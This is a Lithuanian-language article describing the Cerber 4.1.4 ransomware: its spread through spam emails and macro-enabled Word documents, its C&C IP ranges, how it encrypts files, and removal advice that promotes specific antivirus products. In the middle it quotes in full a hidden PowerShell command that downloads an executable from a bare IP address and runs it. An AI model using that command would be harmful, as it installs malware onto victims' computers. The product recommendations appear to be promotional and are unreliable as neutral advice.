Teroras tęsiasi – pasirodė Cerber 4.1.4 virusas
Cerber 4.1.4 virusas yra grėsmingosios Cerber kibernetinės kampanijos tęsinys. Praėjo savaitė, kai hakeriai sudrebino virtualią bendruomenę su Cerber 4.1.0 ir Cerber 4.1.1 viruso versijomis. Matyt, šios failus užkoduojančio viruso versijos buvo per silpnos, todėl buvo sukurtas dar vienas atnaujinimas. Jis tęsia pirmtakų darbą ir į užgrobtus failus įterpia plėtinį, sudarytą iš atsitiktinių simbolių. Paskutinioji versija buvo atnaujinta Locky ransomware pavyzdžiu ir yra aktyvuojama panašiu būdu. Cerber 4.1.4 virusas naudoja Word dokumentą ir prašo įgalinti Macro komandas, kad viruso vykdomasis failas galėtų patekti į kompiuterį. IT specialistai plačiai diskutuoja apie šią viruso plėtros strategiją, kurią naudojo ir Locky virusas. Interneto vartotojai, kurie seka IT pasaulio naujienas, tikrai gali išvengti šio kibernetinio pavojaus. Tačiau, jeigu virusui vis dėlto pavyko įsibrauti į jūsų kompiuterį, nėra jokio reikalo panikuoti. Tiesiog turite pašalinti Cerber 4.1.4 pasinaudodami FortectIntego.
Naujoji viruso versija tęsia pirmtakų pradėtus darbus ir kelia chaosą visame pasaulyje. Kaip ir 4.1.0 bei 4.1.1 versijos, jis taip pat naudoja IP adresą, kad galėtų nusiųsti UDP paketus į nuotolinį Command & Control serverį. Paskutinioji versija patobulino šią techniką ir naudoja trijų IP adresų rinkinį (5.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22), kurie padeda perduoti techninę informaciją į serverį. Ši savybė leidžia viruso kūrėjams surinkti daugiau vertingos informacijos apie užgrobtus kompiuterius. Akivaizdu, kad tokia galimybė įkvepia hakerius tobulinti virusą ir kurti dar pavojingesnes jo versijas.

Vienas pagrindinių Cerber 4.1.4 viruso išskirtinumų yra naujas jo sklaidos būdas. Ankstesnės šio failus užkoduojančio viruso versijos jau naudojo „spam“ žinutes ir netikras sąskaitas siekiant įsibrauti į kompiuterius, tačiau ši versija pradėjo naudoti Macro komandas. Kai vartotojas atidaro gautą .doc failą, jis pamato MS Word dokumentą, kuriame pateikiamos atsitiktinių ženklų ir kodų eilutės. Visa laime, naujosios Microsoft Word versijos išjungė automatinį Macro komandų aktyvavimą. Tad virusas prašo vartotojų jas aktyvuoti. Paskui, kai reikiami nustatymai yra modifikuoti, Cerber 4.1.4 ransomware virusas paleidžia PowerShell. Po kelių sekundžių, base64 tipo komandos eilutė pradeda viruso aktyvavimą ir pabaigia šia eilute:
POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile(‘http://94.102.58.30/~trevor/winx64.exe’,”$env:APPDATA\winx64.exe”);Start-Process („$env:APPDATA\winx64.exe”)
Kaip matote, ši komanda reikalinga tam, kad būtų atsiųstas ir aktyvuotas pagrindinis aktyvavimo elementas – win64.exe failas. Tačiau, jeigu naudojate 32-bit Windows system, aktyvavimo failas yra win32.exe. Tuomet virusas palieka failą %AppData% aplanke ir elgiasi įprastai: užkoduoja visus kompiuteryje esančius duomenis ir darbalaukyje palieka Readme.hta failą. Be to, failų šifravimui pasibaigus, pakeičiamas darbalaukio fono paveikslas, kuriame informuojama apie Cerber 4.1.4 ataką. Išvydę šią žinutę, nepulkite į paniką ir nesuskubkite paklusti kibernetinių nusikaltėlių raginimui sumokėti išpirką. Iš tiesų, kol kas nėra jokio efektyvaus užšifruotų duomenų atkodavimo būdo, tačiau pervesti pinigai negarantuoja, kad hakeriai padės atkurti prarastus failus. Tačiau šiuo metu jūsų prioritetu turėtų tapti Cerber 4.1.4 pašalinimas.
Viruso plėtros ypatumai
Cerber 4.1.4 virusas platinamas naudojant gerai žinomą ir hakerių pamėgtą strategiją – užkrėstas elektroninio pašto žinutes (spam). Interneto vartotojai yra nuolatos perspėjami dėl elektroniniame pašte tykančių pavojų ir perspėjami neatidaryti sąskaitų, oficialių dokumentų ar policijos pranešimų, kuriuos atsiunčia nežinomi siuntėjai. Tačiau nukentėjusiųjų skaičius vis tiek išlieka aukštas. Kibernetiniai nusikaltėliai naudoja puikiai apgalvotas įtikinėjimo strategijas ir sėkmingai priverčia vartotojus paklusti jų scenarijui. Tad jeigu gavote laišką iš policijos, mokesčių inspekcijos ar kitos oficialios institucijos, prieš atidarydami laiške prisegtą dokumentą, įsitikinkite jo tikrumu. Atidžiai peržiūrėkite, ar nėra paliktų gramatinių, raštvedybos ar kitokių klaidų. Taip pat atkreipkite dėmesį į tai, ar yra pridėti įmonę reprezentuojantys atributai (logotipas, parašas ir pan.), o jų nebuvimas yra svarbus indikatorius, kad laiškas greičiausiai yra netikras.
Ar įmanoma visiškai pašalinti Cerber 4.1.4 virusą?
Efektyvus Cerber 4.1.4 pašalinimas įmanomas tik tada, kai naudojama patikima antivirusinė programa. Įdiegę programą ją atnaujinkite ir tuomet pradėkite viruso pašalinimą. Tokios antivirusinės programos, kaip FortectIntego ar SpyHunterCombo Cleaner, įprastai sugeba pašalinti Cerber 4.1.4 virusą per kelias minutes. Tačiau jeigu norite atkurti prarastus failus, jums teks nusivilti. Vienintelis efektyvus būdas atkurti užšifruotus duomenis yra pasinaudoti atsarginėmis duomenų kopijomis. Jeigu jų neturite, galite mėginti pasinaudoti alternatyviais failų atkūrimo būdais, kuriuos rasite straipsnio pabaigoje. Be to, jeigu virusas užrakino jūsų kompiuterio ekraną ar negalite įdiegti antivirusinės programos, atidžiai sekite žemiau pateiktas instrukcijas.
Ar ši instrukcija padėjo?
Būkite pirmas pakomentavęs